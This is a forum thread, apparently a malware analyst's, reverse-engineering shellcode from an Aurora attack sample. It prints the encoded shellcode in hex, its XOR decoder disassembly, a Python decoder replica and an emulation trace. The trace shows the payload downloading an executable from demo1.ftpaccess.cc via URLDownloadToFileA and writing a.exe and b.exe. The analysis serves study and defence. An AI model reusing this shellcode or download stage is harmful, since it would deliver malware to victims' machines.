Thread: Aurora Example

  1. #1
    051r15
    Guest

    Aurora Example

    Having got a sample of the Aurora attack, I'm trying to examine the shellcode.

    http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js

    9090eb195b4b9033c990807b01e97501c366b97b0480340bd8e2faeb05e8e2ffffff3139fdffd887bc79fdfffdff5398d453 a8c47553b0d0532fb2d78130fdfffdff483a20b0ebeafdffb08dabbdaa8c539ed430fdfffdff5330fdff8130fdfffdff3a21 b0b7fdffd8b0adaab4b58c539ed43008fdffd85330b2d981309afdffd83a21b0b4ebfdffb0abb0bdb48c539ed430fdfffdff 5330fdff8130fdfffdff3a215934fdfffdff5304591bfdfffdfffdffb2c28bb2d8278e9ceb189858fdffd8ad21515e48fdff d81ffdff84b9f6bd1f9cfdffa0bdfdffeb1189898b8f89eb18539e983086fdffd85bfdffd75dfdfffdfffdfffdfffdfffdff fdfffdfffdff188b539efc30fdfffdff5b2027d75c86fdffd8519eb8fdff88278ef0519ebc535e48fdffd81ffdff84baf6bd 1f9cfdffa0bdfdfffdfffdfffdfffdfffdfffdfffdff988b539efc30fdfffdff5b2027d75cc4fdffd8515e5cfdffd8514654 fdffd8539eb8fdfffdfffdff539eb888278ee01f9ea8fdfffdff1f9efdfffdffd859fdfffdffd8eb035386bcfdff559ea888 fdfffdffd88f27aeb827fdffeb11fdfffdffd858a4d7274dacd458a4d727d8acdd58acd7274d3a33531bfdfffdffd85bfdff fdff5186a8b2d8559eac8827aea88f276e5cfdffd8278ee85933fdfffdff5b23d8a77d27aeb8278eec276e5cfdffd8278eec 535efdfffdff5346fdffd8d81fdcdb84b9f6bd8b278ef4536654fdffd8535e48fdffd81ffdff84baf6bd5934fdfffdff5304 fdfffdffd88bfdfffdffd88ffdfffdff278ec45323eb18eb0359fdfffdffd853145b208ca5d051c4d95bfdff332b53145301 5b1bc8eb1888898b8888888888888f8888539ed0302ffdffd853a6e430ecfdffd830fdfffdffb0bbaeafd8b0abb0bcb78c53 9ed4306efdffd8519ee4bc79fdfffdff5578b8272727b2bd27aee4539ec83042fdffd8eb038b8b8b8b270830fdfffdff5934 fdfffdff53245b1fdc1fdfeaac49d41ffdffbb5109971f9fd078bd4f131f9fd4899862a71f9fc8e6c56ee11f9fcc60b10cc3 1f9fc066a7be781f9fc42471ef751f9ff840d2c820bc79e8fdffd85398d453a8c47553b0d0532f518ebcfdff8130fdfffdff 483a20b0ebeafdffb08dabbdaa8cfdff30cafdffd85330b2dd81305cfdffd83a21eb278f278edc58e03058e031adc959fdff 48484848acd053278d533455fdff273830e0fdffd81b58e03058e031adc959a0dd48484848ac3fb0d0d2fdff5598dd273830 fdfffdff1b30fdfffdff60c9fdff581afdfffdff801b302127272783fdff6051fdffbe1ffdff27381b8b53048bb298b0d8c8 
fdff8f539ef8305e272727801b898e53ade453acf6a0db2d8e53aef8db2deb119199fdff1deb03d766c8e20eacd01913fdff 02983329e3c7ad3f865386fcdb05be53d4935386fdff0553dc53db1d7386811b30c22427276a2a3a2c6aeed7cb2890a3e5ea ac49d45d077763bb510997899862fdff4afaa8c67cbc374bea3c4c56cbd274a1e13e401c55c7ac8fbed5279b66740340d2c8 20580e7742238bcdbeb0acaca8e2f7f7bcbdb5b7e9f6beaca8b9bbbbbdababf6bbbbf7bcbdb5b7f7b9bcf6b2a8bfd800

    This, on execution, gives:

    401020 nop
    401021 nop
    401022 jmp 1d
    40103d call 401024
    >>>>>>>>>>>>>>>>>>>>>>>
    401024 pop ebx
    401025 dec ebx
    401026 nop
    401027 xor ecx, ecx
    401029 nop
    40102a cmp byte ptr [ebx+01], e9
    40102e jnz 11
    401031 mov cx, 47b
    401035 xor byte ptr [ecx+ebx], d8
    401039 loop 15
    ... which XORs a region with d8, then jumps into this area
    40103b jmp 401042
    However, this turns out to be a jump out of the routine, to a non-code area, which can't be right:
    401042 jmp 272608

    The XORing looks correct because the string http://demo1.ftpaccess.cc/demo/ad.jpg is revealed, presumably as a parameter to a downloader. What have I missed?
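The decoder stub in the post above can be reproduced without running the shellcode. The script below is an added example, not code from the original post: it parses the stub's own fields (the 0x47b length, the 0xd8 key, the 0xe9 guard byte and the call/pop trick that locates the payload), applies the same XOR loop, and searches the result for strings. The 34 stub bytes and the last 39 bytes of the dump are copied from the thread; everything in between is constructed filler, because the posted dump is not clean (my reading is that the repeated "fdff" is a U+FFFD replacement character left by a text conversion, which is an assumption). The stub offsets are read off the posted disassembly and are checked against the opcode bytes, so a mangled dump fails loudly instead of decoding to garbage.

```python
"""Replicate the Aurora XOR decoder stub: parse its parameters, decode, and
dump strings. Added example; not code from the original post."""
import re
import struct

# First 34 bytes of the posted dump: the decoder stub (copied from the thread).
STUB_HEX = "9090eb195b4b9033c990807b01e97501c366b97b0480340bd8e2faeb05e8e2ffffff"
# Last 39 bytes of the posted dump: the encoded URL and its terminator.
TAIL_HEX = ("b0acaca8e2f7f7bcbdb5b7e9f6beaca8b9bbbbbdababf6bbbbf7"
            "bcbdb5b7f7b9bcf6b2a8bfd800")

# Offsets inside the stub, read off the posted disassembly (base 0x401020).
STUB_LEN   = 34   # the call at 0x40103d is the last stub instruction
POP_OFF    = 4    # 5b 4b          pop ebx / dec ebx
GUARD_OFF  = 10   # 80 7b 01 imm8  cmp byte [ebx+1], guard
MOV_CX_OFF = 17   # 66 b9 imm16    mov cx, length
XOR_OFF    = 21   # 80 34 0b imm8  xor byte [ebx+ecx], key
JMP_OFF    = 27   # eb rel8        jmp over the call, into the decoded bytes
CALL_OFF   = 29   # e8 rel32       call back to pop ebx


def parse_stub(stub: bytes):
    """Recover (length, key, guard, payload_off), checking each opcode."""
    if len(stub) < STUB_LEN:
        raise ValueError("stub too short")
    if stub[POP_OFF:POP_OFF + 2] != b"\x5b\x4b":
        raise ValueError("no 'pop ebx; dec ebx' at offset 4")
    if stub[GUARD_OFF:GUARD_OFF + 3] != b"\x80\x7b\x01":
        raise ValueError("no 'cmp byte [ebx+1], imm8' at offset 10")
    guard = stub[GUARD_OFF + 3]
    if stub[MOV_CX_OFF:MOV_CX_OFF + 2] != b"\x66\xb9":
        raise ValueError("no 'mov cx, imm16' at offset 17")
    length = struct.unpack_from("<H", stub, MOV_CX_OFF + 2)[0]
    if stub[XOR_OFF:XOR_OFF + 3] != b"\x80\x34\x0b":
        raise ValueError("no 'xor byte [ebx+ecx], imm8' at offset 21")
    key = stub[XOR_OFF + 3]
    if stub[CALL_OFF] != 0xe8:
        raise ValueError("no call at offset 29")
    rel32 = struct.unpack_from("<i", stub, CALL_OFF + 1)[0]
    call_end = CALL_OFF + 5
    if call_end + rel32 != POP_OFF:
        raise ValueError("call does not land on 'pop ebx'")
    # pop ebx yields the address after the call; dec ebx backs it up by one,
    # so [ebx+ecx] for ecx = length..1 covers exactly the `length` bytes
    # that follow the call.
    payload_off = call_end
    # After the loop, 'jmp +5' must land on that same first payload byte.
    if stub[JMP_OFF] != 0xeb or JMP_OFF + 2 + stub[JMP_OFF + 1] != payload_off:
        raise ValueError("post-decode jump does not land on the payload")
    return length, key, guard, payload_off


def decode(blob: bytes) -> bytes:
    """Apply the stub's own loop to blob (stub + encoded payload)."""
    length, key, guard, off = parse_stub(blob[:STUB_LEN])
    out = bytearray(blob)
    # 'cmp byte [ebx+1], 0xe9 / jnz +1 / ret' is a run-once check: in the
    # posted dump the first payload byte is 0x31, which decodes to 0xe9 (a
    # jmp rel32), so finding 0xe9 there means "already decoded, return".
    if out[off] == guard:
        return bytes(out)
    for i in range(off, min(off + length, len(out))):  # tolerate a short dump
        out[i] ^= key
    return bytes(out)


def find_strings(data: bytes, minlen: int = 6):
    """Printable ASCII runs of at least minlen bytes."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]


def build_sample() -> bytes:
    """Stub + constructed filler + the posted tail, sized to the stub's length.

    The filler is an assumption for this example: 0x31 so the first byte
    decodes to the 0xe9 guard value, then key bytes, which decode to zeros.
    """
    stub, tail = bytes.fromhex(STUB_HEX), bytes.fromhex(TAIL_HEX)
    length, key, _, _ = parse_stub(stub)
    filler = b"\x31" + bytes([key]) * (length - len(tail) - 1)
    return stub + filler + tail


if __name__ == "__main__":
    length, key, guard, off = parse_stub(bytes.fromhex(STUB_HEX))
    print(f"length={length:#x} key={key:#x} guard={guard:#x} payload@{off}")
    for s in find_strings(decode(build_sample())):
        print(s.decode())
```

Run against the full dump (once a clean copy is obtained) by replacing build_sample() with the bytes from the sandbox report; the opcode checks in parse_stub will reject a copy that has been altered the way the one in the post was.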

  2. #2
    051r15
    Guest
    Ah ha! I can see what I've done wrong: I've corrupted the shellcode! It now looks like
    a Kernel32 search.

  3. #3
    051r15
    Guest
    401380 KERNEL32.DLL.LoadLibraryA("User32")->1027b4d
    401380 KERNEL32.DLL.LoadLibraryA("urlmon")->ab50cd
    401380 KERNEL32.DLL.LoadLibraryA("shell32")->15eb0a9
    4010d7 SHELL32.SHGetSpecialFolderPathA(0,12ff20,1a,0)->1
    401380 URLMON.URLDownloadToFileA(0,"http://demo1.ftpaccess.cc/demo/ad.jpg","\a.exe",0,0)->0
    401380 KERNEL32.DLL.CreateFileA("\a.exe",c0000000,2,0,3,0,0)->a26b3429
    401139 KERNEL32.DLL.GetFileSize(a26b3429,0)->500
    401380 KERNEL32.DLL.CreateFileA("\b.exe",40000000,0,0,2,0,0)->a2794baa
    40118e KERNEL32.DLL.SetFilePointer(a26b3429,0,0,0)->1
    4011b9 KERNEL32.DLL.ReadFile(a26b3429,401675,400,40149d,0)->1
    This seems to look for a d5 byte:
    4011bc xor ecx, ecx sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[0]edx[0]esi[40142d]edi[401675]z[1]c[0]s[1]
    4011be mov ecx, 400 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[1]c[0]s[1]
    4011c3 cmp byte ptr [ecx+edi-01], ffffffffffffff95 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[0]c[1]s[1]
    4011c8 jz 1b6 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[0]c[1]s[1]
    4011ca cmp byte ptr [ecx+edi-01], 00 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[1]c[0]s[0]
    4011cf jz 1b6 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[1]c[0]s[0]
    4011d6 loop 1a3
